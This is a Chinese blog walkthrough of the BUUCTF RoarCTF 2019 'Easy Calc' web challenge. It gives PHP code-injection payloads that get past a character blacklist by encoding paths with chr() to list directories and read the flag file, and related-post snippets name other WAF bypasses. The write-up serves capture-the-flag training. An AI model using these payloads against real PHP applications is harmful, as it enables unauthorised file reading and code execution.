BUUCTF [RoarCTF 2019]Easy Calc

最新推荐文章于 2023-12-15 12:02:29 发布
最新推荐文章于 2023-12-15 12:02:29 发布
阅读量800 收藏 3
点赞数
分类专栏: buuctf 文章标签: buuctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53030229/article/details/121234630
版权

文章目录

一、 [RoarCTF 2019]Easy Calc

1、检查源码

       1、当拿到题目时,本人以为是使用Linux命令获取flag,但是尝试之后不行
在这里插入图片描述       2、检查源码,发现了calc.php,打开

在这里插入图片描述
       3、打开calc.php,发现题目过滤了好多东西
在这里插入图片描述

2、利用PHP的字符串解析绕过

       1、扫描目录下文件

scandir() 函数返回指定目录中的文件和目录的数组。
? num=print_r(scandir('/'))
# 这里由于斜杠被过滤,所以使用chr()绕过
? num=print_r(scandir(chr(47)))

在这里插入图片描述
       2、读取flag

             file_get_contents() 函数把整个文件读入一个字符串中。

? num=print_r(file_get_contents('/f1agg'))
由于有些东西被过滤,所以使用字符串来绕过
? num=print_r(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

flag{6578237a-51cc-49b9-86aa-1345497dcef1}

文章借鉴:https://blog.csdn.net/weixin_45674567/article/details/106498395,如有冒犯或错误,请及时告知,Thanks♪(・ω・)ノ!

ter_ret
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF [RoarCTF 2019]Easy Calc1
qq_35874748的博客
10-19 2899
一.打开题目后: 二.Ctrl+U查看源代码: 发现存在WAF和一个文件calc.php,这里我们就需要简单的了解下什么是WAF了: WAF的全称是(Web Application Firewall)即Web应用防火墙,简称WAF。 那么WAF能做什么? WAF可以过滤HTTP/HTTPS协议流量,防护Web攻击。 WAF可以对Web应用进行安全审计 WAF可以防止CC攻击 应用交付 CC攻击:通过大量请求对应用程序资源消耗最大的应用,如...
BUUCTF[RoarCTF 2019]Easy Calc
楼阁de猫的博客
12-23 134
[RoarCTF 2019]Easy Calc 查看源码 $("#content").val(): 获取id为content的HTML标签元素的值,是JQuery, 发现有calc.php,看看有什么 这里显示了waf的过滤规则 我们上传字符发现都被过滤了,这里考察的是PHP的字符串解析特性 PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事: 1.删除空白符 2.将某些字符转换为下划线(包括空格) 利用这个特性,我们就可以在num前面加一个空格,然后就能绕过waf,执行
[RoarCTF 2019]Easy Calc
weixin_52116519的博客
04-16 4836
原理1:利用PHP的字符串解析特性 参考文章:利用PHP的字符串解析特性Bypass PHP将查询字符串(在URL或正文中)转换为内部$_GET或关联数组$_POST。值得注意的是,查询字符串在解析的过程中会将某些字符删除或用下划线代替。 例如: /?foo=bar变成Array([foo]=> “bar”)。 /? foo=bar变成Array([foo]=> “bar”)。 //?号后有一个空格 /?+foo=bar变成Array([foo]=> “bar”)。 //?号后有一个+
BUUCTF WEB [RoarCTF 2019]Easy Calc(小宇特详解)
小宇的web博客
01-18 705
BUUCTF WEB [RoarCTF 2019]Easy Calc(小宇特详解) 打开网页后是这样的。 这里先查看一下源代码 这里显示是有waf的,直接访问一下calc.php来查看。 <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n
[RoarCTF 2019]Easy Calc1 wp
最新发布
m0_73612768的博客
12-15 1348
这里用到的方法有:空格绕过,url 溢出,http 请求走私。三种方法均可用来绕过 waf
Calc Easy-开源
05-29
一个相当简单的快速计算器实现示例。
CRC_Calc .rar
12-04
压缩包内包含CRC_Calc和CheckOut两种全面的CRC计算器,涵盖几乎所有类型的CRC算法的计算,方便快捷,
win32calc简繁版
09-07
Win32 版本的计算器,简洁易用,从 LTSC 版本剥离。如果厌恶臃肿华而不实的 UWP 版计算器,可以试试这个版本。
sm.rar_calc
09-14
Program for calc symplex method...
my_calc.rar_calc
09-24
基于Delphi7开发的Windows科学计算器
css3中的calc函数浅析
09-22
calc()对大家来说,或许很陌生,不太会相信calc()是css中的部分。但它却是就是css3的一部分,下面这篇文章主要给大家介绍了关于css3中calc函数的相关资料,文中通过示例代码介绍的非常详细,需要的朋友可以参考下
浅析CSS中calc()的使用
01-19
calc()是css3中新出现的特性,可以用于动态计算,非常方便。首先是兼容性 再来看看怎么使用 CSS Code复制内容到剪贴板 html{   font-size: 20px; } div{ width: calc(50% – 1px); height: calc...
BUUCTF-web类-第六题 [RoarCTF 2019]Easy Calc
weixin_44622228的博客
04-17 374
BUUCTF-web类-第六题 [RoarCTF 2019]Easy Calc 进入靶场,发现只有一个计算器的页面, 输入1+2看看,返回了答案3 常规想法,输入单引号试试,弹出了一个窗口 经过多个字符测试,发现都会导致弹窗,这时候我们看看F12看看, 有一段注释说这题有WAF,那肯定思路就是如何绕过WAF拿到flag了 注释下还有一段js代码,通过代码可以发现还有个calc.php页面,于是...
[BUUCTF][RoarCTF 2019]Easy Calc
cosmoslin的博客
10-11 154
[RoarCTF 2019]Easy Calc 考点:php字符解析特性 解析 先查看源码,有一个WAF $('#calc').submit(function(){ $.ajax({ url:"calc.php?num="+encodeURIComponent($("#content").val()), type:'GET', success:function(data){ $("#re
BUUCTF-Easy Calc
m0_62094846的博客
12-19 356
一个计算的工具 查看源代码,有WAF 还有url calc.php 输入数字可以,但是输入字母就会出问题 加了空格就可以成功 试过ls,不行 用scandir()函数读取文件夹里的文件,再输入print_r(print printf也可以)输出 print_r PHP中的打印函数 PHP打印输出函数汇总-php教程-PHP中文网 scandir() 函数返回指定目录中的文件和目录的数组 但是/被过滤了,用url编码也读不出来,就试着<chr...
[roarctf 2019]easy calc
03-16
这道题是一道简单的逆向工程题目,给出了一个计算器程序和加密后的标志,需要我们破解加密算法并计算出正确的标志。 我们可以使用反编译工具对程序进行反编译,然后找到加密算法的相关代码。在这个程序中,加密算法使用了一种简单的替换算法,它会将输入字符串中的每个字符替换成固定的字符。 我们只需要编写一个解密程序,使用相同的替换表将加密后的标志还原成原始标志。一旦还原了标志,我们就可以提交它来获得得分。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值